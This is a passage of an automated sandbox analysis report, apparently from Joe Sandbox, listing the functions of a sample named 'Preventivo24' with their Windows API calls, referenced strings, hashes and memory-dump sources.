PeekMessageW.USER32(?,00000000), ref: 00FBE698
TranslateMessage.USER32(00000000), ref: 00FBE6A7
DispatchMessageW.USER32(00000000), ref: 00FBE6B2
MsgWaitForMultipleObjectsEx.USER32(00000001,00000000,000000FF,000005FF,00000004), ref: 00FBE6C8

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Message$MultipleObjectsWait$DispatchPeekTranslate
String ID:
API String ID: 4084795276-0
Opcode ID: d0a4cfd5b1f7441d4afa358cc21b3d13eedc87f4a0fcbc66bb7647004a4b542a
Instruction ID: 4793583aaa0275e071a5bc6690e7510a9d758649e527b9fbe5848ab9cfad399a
Opcode Fuzzy Hash: d0a4cfd5b1f7441d4afa358cc21b3d13eedc87f4a0fcbc66bb7647004a4b542a
Instruction Fuzzy Hash: 1801D470A493017FFB249F618D49FAB77ACAF58B20F544639F628D10D0EB74D5848B26

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2A70 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 372COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(00000010,B5580983,?,00000010,?), ref: 00FE2DAE

Part of subcall function 00FB9280: GetCurrentProcess.KERNEL32 ref: 00FB92D2
Part of subcall function 00FB9280: OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00FB92DF
Part of subcall function 00FB9280: GetLastError.KERNEL32 ref: 00FB92E9
Part of subcall function 00FB9280: FindCloseChangeNotification.KERNEL32(00000000), ref: 00FB93CC

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

Strings

[WindowsVolume], xrefs: 00FE2B0C, 00FE2B1E, 00FE2B28
\\?\, xrefs: 00FE2DBB
Extraction path set to:, xrefs: 00FE2E11

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Process$Find$ChangeCloseCurrentErrorHeapLastNotificationOpenPathResourceToken
String ID: Extraction path set to:$[WindowsVolume]$\\?\
API String ID: 1213284423-3538578949
Opcode ID: 74394019640cc6c47444f4b4f32b46df4faf3f63119a23111e5deb74f2d40bd0
Instruction ID: bc6f166de2de8932b204d78f3f5c8896ac57473ae0b7682caca48a92b4978f87
Opcode Fuzzy Hash: 74394019640cc6c47444f4b4f32b46df4faf3f63119a23111e5deb74f2d40bd0
Instruction Fuzzy Hash: 1FD1D331A00659DFDB04DFA8C855BADB7B5FF48320F244259E925AB3D1EB34AE01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD400 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983), ref: 00FBD4B0

Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3

DeleteFileW.KERNEL32(?,B5580983,?,?,?,?,00000000,010B6CAD,000000FF,?,00FBD21A), ref: 00FBD4EB
GetLastError.KERNEL32(?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983,?,?,00000000,?,?,010B6CAD), ref: 00FBD4FB

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Strings

\\?\, xrefs: 00FBD351, 00FBD363, 00FBD36D, 00FBD471, 00FBD483, 00FBD48D

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DeleteFile$ErrorFindHeapLastProcessResource
String ID: \\?\
API String ID: 2079828947-4282027825
Opcode ID: e36c33e2b335dccc2f3f0854d0ccf2206b8d4bd0233f4390424ef61f6db044a6
Instruction ID: dd8dfa4595dc29eadca2fcc951abe6d561d6d9d02d2ab1d0e993523a6807b6a8
Opcode Fuzzy Hash: e36c33e2b335dccc2f3f0854d0ccf2206b8d4bd0233f4390424ef61f6db044a6
Instruction Fuzzy Hash: 6F31A036A00619DFDB14DFA9D848BADB7B8FF05320F144569E825E7390EB39A900DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FD9130 Relevance: 6.3, APIs: 4, Instructions: 346COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FD9208

Part of subcall function 00FEBC30: CreateThread.KERNEL32(00000000,00000000,Function_0018AA80,0116001C,00000000,?), ref: 00FEBCAD
Part of subcall function 00FEBC30: GetLastError.KERNEL32 ref: 00FEBCBA
Part of subcall function 00FEBC30: WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00FEBCE3
Part of subcall function 00FEBC30: GetExitCodeThread.KERNEL32(00000000,?), ref: 00FEBCFD
Part of subcall function 00FEBC30: TerminateThread.KERNEL32(00000000,00000000), ref: 00FEBD15
Part of subcall function 00FEBC30: CloseHandle.KERNEL32(00000000), ref: 00FEBD1E

GetTickCount.KERNEL32 ref: 00FD9430
__Xtime_get_ticks.LIBCPMT ref: 00FD9438
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD9491

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Thread$CloseCodeCountCreateErrorExitHandleHeapInitializeLastObjectProcessSingleTerminateTickUnothrow_t@std@@@WaitXtime_get_ticks__ehfuncinfo$??2@
String ID:
API String ID: 3268554900-0
Opcode ID: ba245a0d361fb1be1d23fc2e791039d33bab2a4d5a21abb652af3df33768cb45
Instruction ID: 3c1948875575852a3de7238acc91d1bdcf80bcc18420e1f709528d82c6a8a430
Opcode Fuzzy Hash: ba245a0d361fb1be1d23fc2e791039d33bab2a4d5a21abb652af3df33768cb45
Instruction Fuzzy Hash: 45D1B271E04209DFDB14DFA8C845BAEBBB9FF48324F14416AE915A7381DB74AA05CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E937C0 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,00000000,00000000,?,B5580983,?,00000004), ref: 00E9381B
DeleteFileW.KERNEL32(?,?,00000004), ref: 00E9385F
CreateDirectoryW.KERNEL32(?,00000000,?,00000004), ref: 00E9386E

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$CreateDeleteDirectoryNameTemp
String ID:
API String ID: 2411147693-0
Opcode ID: fd19db14a280b1ef753a1dd3f57ed2f700924243a5d666bd49bad12c5180c20a
Instruction ID: d9a21610e66df6a104fecfd740a859db4732808f0c39121a707d828f81d99267
Opcode Fuzzy Hash: fd19db14a280b1ef753a1dd3f57ed2f700924243a5d666bd49bad12c5180c20a
Instruction Fuzzy Hash: 5BD16C70D042499FDB24DF68C9997EDBBB4EF55304F20429AE819A7281EB746B84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2700 Relevance: 6.2, APIs: 4, Instructions: 160fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,B5580983), ref: 00FE27DD
GetLastError.KERNEL32 ref: 00FE27E5
RemoveDirectoryW.KERNEL32(?,B5580983), ref: 00FE284D
GetLastError.KERNEL32 ref: 00FE2855

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLast$DeleteDirectoryFileRemove
String ID:
API String ID: 50330452-0
Opcode ID: 19a2695acc3c3dcf0ce4f0320f16aefa763c8fcdef9647dd8fe43c1e91c28a5a
Instruction ID: a1bab6755390bb42bff6d259aef4998b33a8bb0f2f5da6c9991038053a5cb80d
Opcode Fuzzy Hash: 19a2695acc3c3dcf0ce4f0320f16aefa763c8fcdef9647dd8fe43c1e91c28a5a
Instruction Fuzzy Hash: FD51D13190025CCFCF50CF55C884BDEB7B9FF05310F0541A9D915AB285EB38AA48EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FD8DD0 Relevance: 6.2, APIs: 4, Instructions: 159fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,B5580983,?,00000010,?,00FDD2A0,000000FF), ref: 00FD8E36
SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 00FD8E7F
ReadFile.KERNEL32(00000000,B5580983,?,000000FF,00000000,00000078,?), ref: 00FD8EC1
FindCloseChangeNotification.KERNEL32(00000000), ref: 00FD8F58

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 4ec40d80782a0ccd83a805753dc9fa3690d068d05b4ac5f19c4d5a4b65bfbfc0
Instruction ID: 609768bbe71a56994182991fe5df399212e544d738dee1bb07ff1d5abd591217
Opcode Fuzzy Hash: 4ec40d80782a0ccd83a805753dc9fa3690d068d05b4ac5f19c4d5a4b65bfbfc0
Instruction Fuzzy Hash: D15191719006099BDB15CB98CD48BAEBBBAEF04324F284259F921B73C1CB749D46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FC7F80 Relevance: 6.1, APIs: 4, Instructions: 96fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC7A40: SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,B5580983,00000000,00000000,?), ref: 00FC7A9B

GetFileVersionInfoSizeW.KERNELBASE(?,00000000,?,B5580983,00000000,?,?,?,?,00000000,010F8075,000000FF,00000000,00FC7F36,?), ref: 00FC7FCD
GetFileVersionInfoW.KERNELBASE(?,00000000,010F8075,00000000,00000000,?,?,00000000,010F8075,000000FF,00000000,00FC7F36,?), ref: 00FC7FF9
GetLastError.KERNEL32(?,?,00000000,010F8075,000000FF,00000000,00FC7F36,?), ref: 00FC803E
DeleteFileW.KERNEL32(?), ref: 00FC8051

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$InfoVersion$DeleteErrorFolderLastPathSize
String ID:
API String ID: 2825328469-0
Opcode ID: 842ed73fa959c5ddb09cd4b253b94c1f95f1cc7f09f50560108b08d067990c48
Instruction ID: 62d6e33c6576feaa42c4742af37531fcb48ffbf132fa40f1737eb3f55313aea4
Opcode Fuzzy Hash: 842ed73fa959c5ddb09cd4b253b94c1f95f1cc7f09f50560108b08d067990c48
Instruction Fuzzy Hash: 0031A171D0120AABDB14DFA5C945FEEBBB8FF483A0F14416EE411B3240DB399945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBD900 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 387COMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

PathIsUNCW.SHLWAPI(?,?), ref: 00FBDACD

Strings

\\?\UNC\, xrefs: 00FBD9A9, 00FBDA31, 00FBDA37
\\?\, xrefs: 00FBDAAF, 00FBDAB5

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: HeapPathProcess
String ID: \\?\$\\?\UNC\
API String ID: 300331711-3019864461
Opcode ID: 0fe8050d5ca09724cda9464d923721273163dc8ea8267150d7aec7f23f3e0ffc
Instruction ID: ab512e00d1e7fa7d99066606165c1da5c845d6c0f5eedc682f344e7831b696d1
Opcode Fuzzy Hash: 0fe8050d5ca09724cda9464d923721273163dc8ea8267150d7aec7f23f3e0ffc
Instruction Fuzzy Hash: D2D1D071A006098BDB04DBA9CC55BEEB7F9EF48320F184168E521A73D1EB78AD05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FFEB70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,B55809A3,00000000,00000000,-00000002,0115D178,?,?,B5580983,01102006,000000FF), ref: 00FFEC30

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Part of subcall function 00FC0AF0: FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
Part of subcall function 00FC0AF0: GetLastError.KERNEL32(?,00000000), ref: 00FC0B45

Strings

Downloading of updates failed. Error:, xrefs: 00FFECB7
upd, xrefs: 00FFEBAF

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CopyErrorFileFormatHeapLastMessageProcess
String ID: Downloading of updates failed. Error:$upd
API String ID: 2459518595-329979656
Opcode ID: 48e8af32492a9d3e47d666ffd7f8bb6114d691b31b7976ea02e6f4abe617505e
Instruction ID: 7e1b2a2df60c876bea3159100a0ad5f16a5ed3ef1d469d83b2986f1092ef2337
Opcode Fuzzy Hash: 48e8af32492a9d3e47d666ffd7f8bb6114d691b31b7976ea02e6f4abe617505e
Instruction Fuzzy Hash: CF71E531A00249DBDB18DF68CC55BBEB7A6FF44320F18425DE526AB2E1DB34AE05DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2EF0 Relevance: 4.7, APIs: 3, Instructions: 196fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,B5580983,00000000,00000010,?,00000010,?), ref: 00FE2F8B
GetLastError.KERNEL32 ref: 00FE2FCD
GetLastError.KERNEL32(?), ref: 00FE3071

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ErrorLast$CreateFile
String ID:
API String ID: 1722934493-0
Opcode ID: 6cd264979d0dd5ac5b08238329fd7d7060e31fa402d722d0c7c11485ed36be8f
Instruction ID: 14f39b99844601209298d5a6d85fbe50c8b5385bfc5981f4ac27189f7b7ddc48
Opcode Fuzzy Hash: 6cd264979d0dd5ac5b08238329fd7d7060e31fa402d722d0c7c11485ed36be8f
Instruction Fuzzy Hash: B461EF31A00646EFDB18DB29C849BAAF3B5FF44320F14426DE825A72C1EB75B901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0101BAA0 Relevance: 4.7, APIs: 3, Instructions: 185fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(0101CA81,40000000,00000001,00000000,00000002,00000080,00000000,B5580983,?,?), ref: 0101BB02
WriteFile.KERNEL32(00000000,?,0000C800,0000C800,00000000,?,0000C800), ref: 0101BBA8
CloseHandle.KERNEL32(00000000,?,0000C800), ref: 0101BC1C

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: ca18c84cc631ff833ce1fb52d916fa60dff95217518864215b76abc965f7ce18
Instruction ID: 19ce5963b02cd79d81377fb3f86c8b9a633f574680f55ed5967fd161c0a16752
Opcode Fuzzy Hash: ca18c84cc631ff833ce1fb52d916fa60dff95217518864215b76abc965f7ce18
Instruction Fuzzy Hash: E5518F71A01209AFDB14DF98DA44BEEBBF9FF48314F204159E850B7294DB759A00CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FBDD10 Relevance: 4.7, APIs: 3, Instructions: 185COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,B5580983,00000000,?,?,?,?,?,010F68C5,000000FF,?,00FD156C,00000000,?,?), ref: 00FBDD5B
CreateDirectoryW.KERNEL32(010F68C5,00000000,?,00000000,01153928,00000001), ref: 00FBDE1A
GetLastError.KERNEL32 ref: 00FBDE28

Memory Dump Source

